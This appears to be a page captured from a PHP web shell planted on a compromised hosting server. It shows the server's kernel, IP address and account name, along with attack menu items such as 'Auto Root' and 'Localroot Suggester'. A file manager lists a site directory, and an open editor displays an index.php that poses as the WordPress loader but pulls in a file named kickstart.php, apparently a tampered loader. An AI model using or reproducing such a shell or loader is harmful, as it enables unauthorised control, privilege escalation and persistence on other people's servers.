Linux amd.servercpanel.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
LiteSpeed
Server IP : 161.248.188.165 & Your IP : 216.73.216.219
Domains :
Cant Read [ /etc/named.conf ]
User : oishifashion
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
sitepad /
editor /
Delete
Unzip
Name
Size
Permission
Date
Action
site-admin
[ DIR ]
drwxr-xr-x
2025-10-20 10:23
site-data
[ DIR ]
drwxr-xr-x
2025-10-20 10:23
site-inc
[ DIR ]
drwxr-xr-x
2025-10-20 10:23
config.php
3.72
KB
-rwxr-xr-x
2025-10-14 04:00
cron.php
3.76
KB
-rwxr-xr-x
2025-10-14 04:00
index.php
548
B
-rwxr-xr-x
2025-10-14 04:00
kickstart.php
19.57
KB
-rwxr-xr-x
2025-10-14 04:00
license.txt
234
B
-rwxr-xr-x
2025-10-14 04:00
login.php
37.96
KB
-rwxr-xr-x
2025-10-14 04:00
Save
Rename
<?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); $wp_did_header = true; // Load the WordPress library. require_once( dirname( __FILE__ ) . '/kickstart.php' ); // Set up the WordPress query. wp(); // Load the theme template. require_once( ABSPATH . WPINC . '/template-loader.php' );